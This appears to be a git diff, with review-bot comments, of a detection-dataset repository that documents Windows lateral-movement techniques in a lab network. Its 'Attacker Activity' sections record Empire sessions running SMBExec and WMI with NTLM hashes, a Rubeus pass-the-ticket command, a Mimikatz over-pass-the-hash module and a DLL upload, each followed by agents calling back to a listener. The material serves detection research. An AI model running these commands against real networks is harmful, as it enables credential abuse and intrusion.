2019-05-18 21:11:58 https + EXBNZYTS ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 6728 5/0.0 2019-05-18 21:12:02 https + + YR1FKZ6A ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 5228 5/0.0 2019-05-18 21:12:01 https + +(Empire: agents) > +``` \ No newline at end of file 
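Review bot: title typo, `Empire Ivoke DCOM` should be `Empire Invoke DCOM`. The description says the command runs "via MMC20.Application COM object over DCOM", but `Method` was never set and stayed at its default `ShellWindows` (only `Listener` and `ComputerName` were set before `execute`), so what the dataset captures is the ShellWindows method; either `set Method MMC20.Application` and re-record, or change the description to say ShellWindows. This file also keeps the `## Empire Activity` heading while every other file in the patch is renamed to `## Attacker Activity`.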
diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz new file mode 100644 index 00000000..517f95f4 Binary files /dev/null and b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz differ diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md index 213c82f8..e616a4c5 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md @@ -4,8 +4,8 @@ Pass the ticket (PtT) is a method of authenticating to a system using Kerberos t ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_rubeus_ptt](./empire_rubeus_asktgt_ptt.md) | 2019-03-19145126 | -| empire | shire | [empire_rubeus_ptt_createnetonly](./empire_rubeus_asktgt_ptt_createnetonly.md) | 2019-03-19151006 | -| empire | shire | [empire_mimikatz_opth](./empire_mimikatz_opth.md) | 2019-03-19131123 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_rubeus_ptt](./empire_rubeus_asktgt_ptt.md) | 2019-03-19145126 | +| shire | [empire_rubeus_ptt_createnetonly](./empire_rubeus_asktgt_ptt_createnetonly.md) | 2019-03-19151006 | +| shire | [empire_mimikatz_opth](./empire_mimikatz_opth.md) | 2019-03-19131123 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md index 9a77e366..1609cf64 100644 
--- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md @@ -1,4 +1,3 @@ - # Empire Mimikatz Over-Pass-The-Hash When sekurlsa::pth is used to over-pass-the-hash, Mimikatz first creates a new logon type 9 process with dummy credentials - this creates a new "sacrificial" logon session that doesn't interact with the current logon session. It then opens the LSASS process with the ability to write to process memory, and the supplied hash/key is then patched into the appropriate section for the associated logon session (in this case, the "sacrificial" logon session that was started). This causes the normal Kerberos authentication process to kick off as normal as if the user had normally logged on, turning the supplied hash into a fully-fledged TGT. [Reference](https://github.com/GhostPack/Rubeus) @@ -60,7 +59,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2051 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | -## Empire Activity +## Attacker Activity ``` (Empire: 8BLV6USC) > usemodule credentials/mimikatz/pth* diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md index 24fa5546..9e897a46 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md 
@@ -1,4 +1,3 @@ - # Empire Rubeus PTT The asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4, /aes128, /aes256, or /des). A /password flag can also be used instead of a hash - in this case /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options. If no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session. @@ -56,7 +55,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 279 | -## Empire Activity +## Attacker Activity ``` Rubeus.exe asktgt /user:Mmidge /rc4:b415baa073a14f81f8c89a2a384f4a68 /ptt diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md index dcd3640b..45405706 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md 
@@ -1,4 +1,3 @@ - # Empire Rubeus PTT CreateNetOnly The asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4, /aes128, /aes256, or /des). A /password flag can also be used instead of a hash - in this case /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options. If no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session. @@ -83,7 +82,7 @@ Shire | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 917 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 11 | -## Empire Activity +## Attacker Activity ``` (Empire: G6BYHU4F) > diff --git a/small_datasets/windows/lateral_movement/powershell_T1086/README.md b/small_datasets/windows/lateral_movement/powershell_T1086/README.md new file mode 100644 index 00000000..d6e30ab7 --- /dev/null +++ b/small_datasets/windows/lateral_movement/powershell_T1086/README.md 
@@ -0,0 +1,9 @@ +# PowerShell + +PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. + +## Technique Variations Table + +| RT Platform | Network | Dataset | Updated | +| ----------- | ------- | --------- | ------- | +| empire | shire | [empire_invoke_psremoting](../../execution/powershell_T1086/empire_invoke_psremoting.md) | 2019-05-18211456 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md index 7b073fc9..994a213b 100644 --- a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md +++ b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md @@ -6,6 +6,6 @@ Adversaries may also copy files laterally between internal victim systems to sup ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_scm_dll_hijack_ikeext](./empire_scm_dll_hijack_ikeext.md) | 2019-04-03133337 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_scm_dll_hijack_ikeext](./empire_scm_dll_hijack_ikeext.md) | 2019-04-03133337 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md index 675ec542..78d5ffc2 100644 --- a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md 
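Review bot: the new `powershell_T1086/README.md` uses the four-column `RT Platform | Network | Dataset | Updated` table that the pass_the_ticket and remote_file_copy hunks in this same patch remove in favour of `Network | Dataset | Updated`; drop the `RT Platform` column here too so the lateral-movement READMEs share one layout.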
+++ b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md @@ -1,4 +1,3 @@ - # SCM and Dll Hijacking IKEEXT Instead of creating new services, attackers can move laterally using the SCM by copying specifically crafted Dynamic Link Library (DLL) files to trusted directories and restarting services remotely. This is made possible due to the fact that these services call LoadLibrary on libraries not present in the specified path. @@ -65,7 +64,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 835 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 421 | -## Empire Activity +## Attacker Activity ``` (Empire: NZB6SE34) > upload /tmp/wlbsctrl.dll diff --git a/small_datasets/windows/lateral_movement/service_execution_T1035/README.md b/small_datasets/windows/lateral_movement/service_execution_T1035/README.md new file mode 100644 index 00000000..c6bddf53 --- /dev/null +++ b/small_datasets/windows/lateral_movement/service_execution_T1035/README.md @@ -0,0 +1,9 @@ +# Service Execution + +Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation. + +## Technique Variations Table + +| RT Platform | Network | Dataset | Updated | +| ----------- | ------- | --------- | ------- | +| empire | shire | [empire_invoke_psexec](../../execution/service_execution_T1035/empire_invoke_psexec.md) | 2019-05-18210652 | \ No newline at end of file 
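Review bot: same table inconsistency as `powershell_T1086`: `service_execution_T1035/README.md` is added with the `RT Platform` column that the rest of this patch removes from the other lateral-movement READMEs; use the three-column `Network | Dataset | Updated` form.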
diff --git a/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md b/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md new file mode 100644 index 00000000..793360aa --- /dev/null +++ b/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md @@ -0,0 +1,9 @@ +# Trusted Developer Utilities + +There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_msbuild](../../defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md) | 2019-05-18213907 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md new file mode 100644 index 00000000..6659ef63 --- /dev/null +++ b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md 
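Review bot: the description in `trusted_developer_utilities_T1127/README.md` stops mid-sentence ("... bypasses application whitelisting defensive"); finish the sentence and add the closing period. The Dataset column reads `empire_msbuild` while the linked file is `empire_invoke_msbuild.md`; the other rows in this patch use the file name as the link text, so `empire_invoke_msbuild` would be consistent.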
@@ -0,0 +1,11 @@ +# Windows Admin Shares + +Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. + +Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_smbexec](./empire_invoke_smbexec.md) | 2019-05-18210125 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md new file mode 100644 index 00000000..7b1fffa1 --- /dev/null +++ b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md 
@@ -0,0 +1,146 @@ +# Empire Invoke Smbexec + +Executes a stager on remote hosts using SMBExec.ps1 + +## Technique(s) ID + +T1077 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_smbexec.tar.gz](./empire_invoke_smbexec.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18210125 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 738 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 2 | +| System | LsaSrv | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 214 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 104 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Detailed 
File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Credential Validation | 1 | +| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 461 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 458 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 310 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 190 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 36 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 649 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| 
Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule lateral_movement/invoke_smbexec +(Empire: powershell/lateral_movement/invoke_smbexec) > info + + Name: Invoke-SMBExec + Module: powershell/lateral_movement/invoke_smbexec + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @rvrsh3ll + +Description: + Executes a stager on remote hosts using SMBExec.ps1 + +Comments: + https://raw.githubusercontent.com/Kevin-Robertson/Invoke- + TheHash/master/Invoke-SMBExec.ps1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Service False Name of service to create and delete. + Defaults to 20 char random. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Username True Username. + Domain False Domain. + Hash True NTLM Hash in LM:NTLM or NTLM format. + Agent True TKV35P8X Agent to run module on. + Listener True Listener to use. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). 
+ +(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo +(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain shire +(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 8ece039f32592670b45fc801e2a9157d +(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_smbexec) > execute +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 27 +[*] Tasked agent TKV35P8X to run module powershell/lateral_movement/invoke_smbexec +(Empire: powershell/lateral_movement/invoke_smbexec) > Command executed with service PWXYXULFULYYGFYDYBIF on IT001.shire.com + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent XSZ91N7T checked in +[+] Initial agent XSZ91N7T from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to XSZ91N7T at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_smbexec) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:02:06 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:02:09 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:02:08 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:02:10 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:02:08 https + +(Empire: agents) > +``` \ No newline at end of file 
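Review bot: `Invoke-SMBExec` reports `OpsecSafe: True`, but the run creates and deletes a random 20-character service (`PWXYXULFULYYGFYDYBIF`) on IT001.shire.com, and the log table shows exactly those artifacts (`System | Service Control Manager | 2`, `Security | Security System Extension | 1`); the file description should call out the service creation, since that rather than the SMB traffic is the primary detection point. The `agents` listing also shows the resulting agent `XSZ91N7T` running as `*SHIRE\SYSTEM`, which is worth a sentence in the description as it is the expected outcome of service-based execution.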
diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz new file mode 100644 index 00000000..0552b658 Binary files /dev/null and b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz differ diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md index 4e2877d2..a5e26ef0 100644 --- a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md +++ b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md 
@@ -1,9 +1,11 @@ -# Windows Management Instrumentation +# Windows Management Instrumentation (WMI) -An adversary can use WMI to move laterally in the environment +Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_invoke_wmi](./empire_invoke_wmi.md) | 2019-03-19152813 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_wmi](../../execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md) | 2019-05-18214442 | +| shire | [empire_invoke_wmi_debugger](../../execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md) | 2019-05-18215622 | +| shire | [empire_wmic_add_user_backdoor](../../execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backdoor.md) | 2019-05-18231333 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md deleted file mode 100644 index cab83ebe..00000000 --- a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md +++ /dev/null 
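Review bot: "Remote Procedure Call Service (RPCS)" in the new description paragraph is not a standard term; write "Remote Procedure Call (RPC)". Port 135 is also only the RPC endpoint mapper: the DCOM connection WMI uses is then redirected to a dynamically assigned high port, which is the connection the Sysmon NetworkConnect rows in these datasets record, so "RPCS operates over port 135" understates what to look for. If the paragraph is taken from the ATT&CK T1047 technique page, add the citation. The table change is fine (the rows now point at `../../execution/windows_management_instrumentation_T1047/...` and the lateral_movement copy is deleted below), but the new title "Windows Management Instrumentation (WMI)" could carry one line saying these three datasets are shared with the Execution tactic so the cross-directory links do not surprise the reader.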
@@ -1,167 +0,0 @@ - -# Empire Invoke WMI - -An adversary can use powershell to execute a stager via WMI - -## Technique(s) ID - -T1047 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_invoke_wmi.tar.gz](./empire_invoke_wmi.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19152813 - -## About this file - -| log_name | source_name | task | record_number | -|-------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 1039 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 858 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 237 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 23 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 20 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 20 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 16 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 15 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 11 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 7 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 6 | -| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 3 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: 
ProcessAccess) | 517 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 454 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 375 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 234 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 48 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 6 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 870 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 377 | -| Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 4 | - -## Empire Activity - -``` -(Empire: MPB3UHD1) > usemodule lateral_movement/invoke_wmi -(Empire: powershell/lateral_movement/invoke_wmi) > info - - Name: Invoke-WMI - Module: powershell/lateral_movement/invoke_wmi - NeedsAdmin: 
False - OpsecSafe: True - Language: powershell -MinLanguageVersion: 2 - Background: False - OutputExtension: None - -Authors: - @harmj0y - -Description: - Executes a stager on remote hosts using WMI. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True https Listener to use. - CredID False CredID from the store to use. - ComputerName True HR001.shire.com Host[s] to execute the stager on, comma - separated. - Proxy False default Proxy to use for request (default, none, - or other). - UserName False [domain\]username to use to execute - command. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). - Password False Password to use to execute command. - Agent True MPB3UHD1 Agent to run module on. - -FDC01.shire.comhell/lateral_movement/invoke_wmi) > set ComputerName H -(Empire: powershell/lateral_movement/invoke_wmi) > info - - Name: Invoke-WMI - Module: powershell/lateral_movement/invoke_wmi - NeedsAdmin: False - OpsecSafe: True - Language: powershell -MinLanguageVersion: 2 - Background: False - OutputExtension: None - -Authors: - @harmj0y - -Description: - Executes a stager on remote hosts using WMI. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True https Listener to use. - CredID False CredID from the store to use. - ComputerName True HFDC01.shire.com Host[s] to execute the stager on, comma - separated. - Proxy False default Proxy to use for request (default, none, - or other). - UserName False [domain\]username to use to execute - command. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). 
- Password False Password to use to execute command. - Agent True MPB3UHD1 Agent to run module on. - -(Empire: powershell/lateral_movement/invoke_wmi) > execute -[*] Tasked MPB3UHD1 to run TASK_CMD_WAIT -[*] Agent MPB3UHD1 tasked with task ID 5 -[*] Tasked agent MPB3UHD1 to run module powershell/lateral_movement/invoke_wmi -(Empire: powershell/lateral_movement/invoke_wmi) > Invoke-Wmi executed on "HFDC01.shire.com" -[*] Sending POWERSHELL stager (stage 1) to 10.0.10.104 -[*] New agent DECFWPHY checked in -[+] Initial agent DECFWPHY from 10.0.10.104 now active (Slack) -[*] Sending agent (stage 2) to DECFWPHY at 10.0.10.104 - -(Empire: powershell/lateral_movement/invoke_wmi) > agents - -[*] Active agents: - - Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener - ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- - 2MES3XN6 ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 4312 5/0.0 2019-03-19 14:22:50 https - G6BYHU4F ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 9156 5/0.0 2019-03-19 14:22:51 https - MPB3UHD1 ps 172.18.39.105 IT001 *SHIRE\pgustavo cmd 8148 5/0.0 2019-03-19 14:22:51 https - - DECFWPHY ps 172.18.39.5 HFDC01 *SHIRE\Mmidge powershell 904 5/0.0 2019-03-19 14:22:48 https - -(Empire: agents) > -``` \ No newline at end of file diff --git a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md index 1c5c09fe..83b45c09 100644 --- a/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md +++ b/small_datasets/windows/persistence/registry_run_keys_startup_folder_T1060/README.md 
